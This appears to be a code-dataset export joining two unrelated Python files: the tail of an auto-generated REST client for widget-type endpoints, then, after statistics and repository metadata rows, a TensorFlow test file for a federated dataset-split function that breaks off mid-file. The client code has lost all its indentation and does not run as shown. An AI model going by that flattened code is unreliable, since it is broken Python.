Get the Widget Type Details based on the provided Widget Type Id. Widget Type Details extend Widget Type and add image and description properties. Those properties are useful to edit the Widget Type but they are not required for Dashboard rendering. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_widget_type_by_id_using_get_with_http_info(widget_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str widget_type_id: A string value representing the widget type id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: WidgetTypeDetails
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['widget_type_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_widget_type_by_id_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'widget_type_id' is set
if ('widget_type_id' not in params or
params['widget_type_id'] is None):
raise ValueError("Missing the required parameter `widget_type_id` when calling `get_widget_type_by_id_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'widget_type_id' in params:
path_params['widgetTypeId'] = params['widget_type_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetType/{widgetTypeId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WidgetTypeDetails', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_widget_type_using_get(self, is_system, bundle_alias, alias, **kwargs): # noqa: E501
"""Get Widget Type (getWidgetType) # noqa: E501
Get the Widget Type based on the provided parameters. Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. Available for any authorized user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_widget_type_using_get(is_system, bundle_alias, alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:param str alias: Widget Type alias (required)
:return: WidgetType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_widget_type_using_get_with_http_info(is_system, bundle_alias, alias, **kwargs) # noqa: E501
else:
(data) = self.get_widget_type_using_get_with_http_info(is_system, bundle_alias, alias, **kwargs) # noqa: E501
return data
def get_widget_type_using_get_with_http_info(self, is_system, bundle_alias, alias, **kwargs): # noqa: E501
"""Get Widget Type (getWidgetType) # noqa: E501
Get the Widget Type based on the provided parameters. Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. Available for any authorized user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_widget_type_using_get_with_http_info(is_system, bundle_alias, alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:param str alias: Widget Type alias (required)
:return: WidgetType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['is_system', 'bundle_alias', 'alias'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_widget_type_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'is_system' is set
if ('is_system' not in params or
params['is_system'] is None):
raise ValueError("Missing the required parameter `is_system` when calling `get_widget_type_using_get`") # noqa: E501
# verify the required parameter 'bundle_alias' is set
if ('bundle_alias' not in params or
params['bundle_alias'] is None):
raise ValueError("Missing the required parameter `bundle_alias` when calling `get_widget_type_using_get`") # noqa: E501
# verify the required parameter 'alias' is set
if ('alias' not in params or
params['alias'] is None):
raise ValueError("Missing the required parameter `alias` when calling `get_widget_type_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'is_system' in params:
query_params.append(('isSystem', params['is_system'])) # noqa: E501
if 'bundle_alias' in params:
query_params.append(('bundleAlias', params['bundle_alias'])) # noqa: E501
if 'alias' in params:
query_params.append(('alias', params['alias'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetType{?alias,bundleAlias,isSystem}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WidgetType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def save_widget_type_using_post(self, **kwargs): # noqa: E501
"""Create Or Update Widget Type (saveWidgetType) # noqa: E501
Create or update the Widget Type. Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. When creating the Widget Type, platform generates Widget Type Id as [time-based UUID](https://en.wikipedia.org/wiki/Universally_unique_identifier#Version_1_(date-time_and_MAC_address)). The newly created Widget Type Id will be present in the response. Specify existing Widget Type id to update the Widget Type. Referencing non-existing Widget Type Id will cause 'Not Found' error. Widget Type alias is unique in the scope of Widget Bundle. Special Tenant Id '13814000-1dd2-11b2-8080-808080808080' is automatically used if the create request is sent by user with 'SYS_ADMIN' authority. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.save_widget_type_using_post(async_req=True)
>>> result = thread.get()
:param async_req bool
:param WidgetTypeDetails body:
:return: WidgetTypeDetails
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.save_widget_type_using_post_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.save_widget_type_using_post_with_http_info(**kwargs) # noqa: E501
return data
def save_widget_type_using_post_with_http_info(self, **kwargs): # noqa: E501
"""Create Or Update Widget Type (saveWidgetType) # noqa: E501
Create or update the Widget Type. Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. When creating the Widget Type, platform generates Widget Type Id as [time-based UUID](https://en.wikipedia.org/wiki/Universally_unique_identifier#Version_1_(date-time_and_MAC_address)). The newly created Widget Type Id will be present in the response. Specify existing Widget Type id to update the Widget Type. Referencing non-existing Widget Type Id will cause 'Not Found' error. Widget Type alias is unique in the scope of Widget Bundle. Special Tenant Id '13814000-1dd2-11b2-8080-808080808080' is automatically used if the create request is sent by user with 'SYS_ADMIN' authority. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.save_widget_type_using_post_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param WidgetTypeDetails body:
:return: WidgetTypeDetails
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method save_widget_type_using_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetType', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WidgetTypeDetails', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 48.396482 | 835 | 0.654998 | 4,424 | 35,765 | 5.037749 | 0.060805 | 0.062368 | 0.024768 | 0.022614 | 0.968502 | 0.963925 | 0.95697 | 0.950375 | 0.945619 | 0.941715 | 0 | 0.018292 | 0.264784 | 35,765 | 738 | 836 | 48.46206 | 0.829283 | 0.416189 | 0 | 0.790932 | 0 | 0 | 0.214382 | 0.068805 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037783 | false | 0 | 0.010076 | 0 | 0.103275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
72ddf0c2bfb5e199ce39e63970fb464cba0312ca | 32,226 | py | Python | reconstruction/shared/federated_trainer_utils_test.py | garyxcheng/federated | ba7133ead6127af71ea9356e26bfd05c02f8324a | [
"Apache-2.0"
] | 330 | 2020-09-14T23:10:16.000Z | 2022-03-30T19:49:19.000Z | reconstruction/shared/federated_trainer_utils_test.py | garyxcheng/federated | ba7133ead6127af71ea9356e26bfd05c02f8324a | [
"Apache-2.0"
] | 52 | 2020-09-30T06:10:51.000Z | 2022-03-31T19:25:16.000Z | reconstruction/shared/federated_trainer_utils_test.py | garyxcheng/federated | ba7133ead6127af71ea9356e26bfd05c02f8324a | [
"Apache-2.0"
] | 119 | 2020-09-24T04:54:46.000Z | 2022-03-31T21:46:57.000Z | # Copyright 2020, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for federated_trainer_utils.py."""
import tensorflow as tf
from reconstruction.shared import federated_trainer_utils
class FederatedTrainerUtilsTest(tf.test.TestCase):
def test_build_dataset_split_fn_none(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list,
[[0, 1], [2, 3], [4, 5], [0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
def test_build_dataset_split_fn_skip(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5], [0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3]])
def test_build_dataset_split_fn_aggregated(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=2)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
def test_build_dataset_split_fn_none_recon_epochs_variable(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list,
[[0, 1], [2, 3], [4, 5], [0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
def test_build_dataset_split_fn_skip_recon_epochs_variable(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5], [0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3]])
def test_build_dataset_split_fn_aggregated_recon_epochs_variable(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=3)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
def test_build_dataset_split_fn_none_recon_max_steps(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
# Adding more steps than the number of actual steps has no effect.
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=7,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list,
[[0, 1], [2, 3], [4, 5], [0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
def test_build_dataset_split_fn_skip_recon_max_steps(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=3)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [0, 1]])
self.assertAllEqual(post_recon_list, [[2, 3], [4, 5]])
# Adding more steps than the number of actual steps has no effect.
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=7,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=3)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [0, 1]])
self.assertAllEqual(post_recon_list, [[2, 3], [4, 5]])
def test_build_dataset_split_fn_aggregated_recon_max_steps(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=2)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
# Adding more steps than the number of actual steps has no effect.
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=7,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=2)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
def test_build_dataset_split_fn_none_recon_epochs_variable_max_steps(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
def test_build_dataset_split_fn_skip_recon_epochs_variable_max_steps(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5], [0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3]])
def test_build_dataset_split_fn_aggregated_recon_epochs_variable_max_steps(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=3)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
def test_build_dataset_split_fn_none_recon_epochs_variable_max_steps_zero_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=0,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
self.assertAllEqual(post_recon_list, [])
def test_build_dataset_split_fn_skip_recon_epochs_variable_max_steps_zero_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=0,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5], [0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [])
def test_build_dataset_split_fn_aggregated_recon_epochs_variable_max_steps_zero_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=0,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=3)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [])
def test_build_dataset_split_fn_none_recon_epochs_variable_max_steps_multiple_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=2,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list,
[[0, 1], [2, 3], [4, 5], [0, 1], [2, 3], [4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
self.assertAllEqual(post_recon_list,
[[0, 1], [2, 3], [4, 5], [0, 1], [2, 3], [4, 5]])
def test_build_dataset_split_fn_skip_recon_epochs_variable_max_steps_multiple_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=2,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3], [2, 3]])
